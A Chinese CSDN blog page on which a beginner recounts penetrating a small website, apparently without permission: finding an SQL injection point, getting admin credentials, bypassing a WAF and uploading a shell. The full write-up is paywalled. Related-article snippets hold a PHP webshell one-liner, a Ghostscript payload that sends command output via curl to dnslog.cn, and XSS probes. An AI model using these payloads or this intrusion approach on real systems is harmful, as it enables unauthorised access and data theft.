【萌新】记录一次渗透小站的过程

最新推荐文章于 2024-07-01 17:18:24 发布
原创 最新推荐文章于 2024-07-01 17:18:24 发布 · 1k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web渗透 #信息安全 #信息安全入门 #网络安全

本文记录了一位新手在渗透测试过程中,通过URL的特殊字段发现SQL注入点,利用云锁漏洞成功获取到网站管理员的用户名和密码,随后找到后台并尝试上传shell,最终成功绕过云锁防护的故事。这是一次信息安全入门实践的案例。

一开始接触该站



先随便翻阅了一些目录

发现在URL中 “/ProductView.asp?ID=1021    ” 这几个字段格外引人瞩目

于是 二话不说 看看有没有注入点

输入一个  '  看一看  发现报错了!!!

然后惯例 and 1=1, and 1=11

最低0.47元/天 解锁文章
对某小程序的一次渗透记录
布啦啦
03-25 1154
最近报了一个驾校,然后在报名回家以后,就开始疯狂的挂科目一的时长,突然想到这个小程序会不会存在漏洞呢,如果发现了,还可以去CNVD(https://www.cnvd.org.cn/)报一下,一是拿个积分,二是间接修复一下漏洞,毕竟自己的所有信息都在这个小程序里,不想自己有一天因为它存在什么漏洞,导致自己的信息被人偷走,所以本着保护自己的原则,我开始了一次【试探】。具体是哪个小程序,这里我就不说啦,漏洞已经报到CNVD了,写本文只是做一个分享。
关于网络渗透过程以及感想记录
m0_50987622的博客
12-28 3129
12.28 这个网是我很早之前就想攻下的,经历大概如下: 1、想借着ctf的劲头去黑此网,但是失败,原因是,ctf跟实战完全是两码子事儿啊!
一次简单的xss靶机渗透过程记录
最新发布
madao
07-01 1366
简单记录一次打靶的过程,这里我们作为Samuel Lamotte需要进入公司网寻找并利用漏洞索要报销,目前已知了登录密码为fzghn4lw。这里我们主要是利用网存在的存储型xss漏洞去盗取用户cookie。
渗透实例】记录一次XSS渗透过程
TeamsSix 的 优快云 空间
07-03 2517
0x01 找到存在XSS的位置 没什么技巧,见到框就X,功夫不负有心人,在目标网编辑收货地址处发现了存在XSS的地方,没想到这种大公司还会存在XSS。 [外链图片转存失败(img-qUL3DxC1-1562166261579)(https://mp.youkuaiyun.com/mdeditor/1)] 0x02 构造XSS代码连接到XSS平台 XSS平台给我们的XSS代码是这样的: </tExt...
记录一次模拟渗透
0verWatch的博客
07-25 655
前言 今天还模拟了一次真实的挖洞过程,今天这网一共有三个漏洞(都是要经过提醒才能弄出来),因为是搭的环境,简单记录一下思路,顺便当个回顾,源码啥的都没有了,耍完就要求删掉了。 正文 这台服务器有个前提就是跟我们一个网段的服务器,并且开了IIS服务,但是前提我们是不知道他的ip的,这个时候我们需要用一下nmap来扫一下同一网段下的ip nmap -sP -PI -PT 192.16...
记录一次渗透测试全过程
weixin_30730151的博客
12-18 672
一、信息收集:   1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。   2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。 二、任意文件上传:   1、上传php文件:  <?php @system($_GET("cmd")) ?> /* 合理合法过程要接受检查,不然还是传post,默认不记日志 上传路径在下载页面可以爆出...
S-LOVE多端恋爱小站小程序源码 uniapp多端
06-11
总结来说,“S-LOVE多端恋爱小站小程序”是uniapp框架下的一次成功实践,它展示了如何利用uniapp进行多端开发,实现了在H5和微信小程序平台上的无缝切换。对于想要学习uniapp或者恋爱小站类应用开发的开发者来说,这...
一种NR无线小站的同步设计与实现.docx
07-08
无线分布式小站作为5G NR室分解决方案的形态,通过移频技术将高频5G信号转化为低频无线信号,以适应室内覆盖需求。这种无线分布式小站由主单元PAU和分布式单元PRU构成,主单元接收宏的高频信号,经过下变频处理...
5G一体化小站技术需求白皮书
10-07
"5G一体化小站技术需求白皮书" 这份白皮书的主要内容是关于5G一体化小站技术的需求规范,...本白皮书对5G一体化小站技术的需求和应用进行了详细的描述,提供了一个全面的技术指南,旨在帮助5G小站设备的研发和生产。
SQL注入中利用XP_cmdshell提权的用法
得峰的专栏 [网络收藏]
05-15 2794
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口14
记录一次VulnHub 靶场——Escalate_Linux的渗透测试过程
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
03-07 1289
SUID 权限通常用于需要以特定用户权限执行的程序,比如一些系统命令或管理工具。例如,passwd 命令通常具有 SUID 权限,因为它需要修改系统密码文件,这是普通用户无法直接操作的。通过 SUID 权限,普通用户可以执行 passwd 命令来修改自己的密码,而无需获取 root 权限。然而,SUID 权限也带来了安全风险,因为恶意用户可能会利用具有 SUID 权限的程序来进行特权提升或执行其他恶意操作。因此,系统管理员需要谨慎地管理具有 SUID 权限的程序,并确保它们没有潜在的安全漏洞。
一次渗透的具体过程
yaasshole
04-04 594
渗透的具体过程 朋友做了一个财务部门的项目,今天叫我来做免费的渗透测试,下面来谈谈这次的过程和体会。先来介绍一下子服务器的基本情况,windows2000advserver中文版,据称打过了sp3,asp+iis+mssql。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放:FTP(Control)端口80开放:HTTP,WorldWideWeb端口135开放:LocationServ...
一次简单的渗透测试流程
qq_45773001的博客
07-21 818
一次简单的渗透测试(从信息收集到远程桌面登录) 一.信息收集 你是否做了足够的信息收集? 第一次拿到这个页面之后尝试了用一些常用的密码登录,发现不可以登录; 之后查看页面源代码,审查元素发现得到一些信息,他是php语言,用的是IIS7.5; 然后进行端口扫描,目录爆;(这里使用nmap和御剑) 扫描目录后发现www,zip是网所有的目录,审查的时候发现了账号密码; 二.网页中的敏感信息 网中经常会有一些敏感信息泄露出来 三.登录网之后有没有的漏洞发现 登录成功之后可以利用bp抓包分
一次相对完整的渗透测试
蚁景网安学院
04-20 750
实操推荐:SQL注入https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182015060916565800001&pk_c...
记录一次vuln靶场的渗透过程---driftingblues9
bobo_milk的博客
05-06 1392
一次渗透记录 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决.
一次渗透经历
wuliyouMaozhi的博客
08-31 733
每一个参数都有可能是我们渗透成功的利刃,不要因为个别参数不行而放弃所有参数。
一次初级渗透测试模拟过程
大方子
10-07 1348
0x00 前言       网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐。参赛者在竞技过程中能够更大的限度的收获专业知识、激发潜能。为了让更多人切身体会到网络安全攻防赛,这次我们模拟了一次初级渗透测试攻防赛的过程。   0x01 模拟环境   实验环境: · 外网1: 192.168.15.53 · 外网2: 192.168...
记录一次常规的渗透测试
我想做一个好人<svg/onload=Alert`1`>(
06-01 507
首先是魔图漏洞 %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops 然后windows下载后门。 方法1:certutil.exe -urlca
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值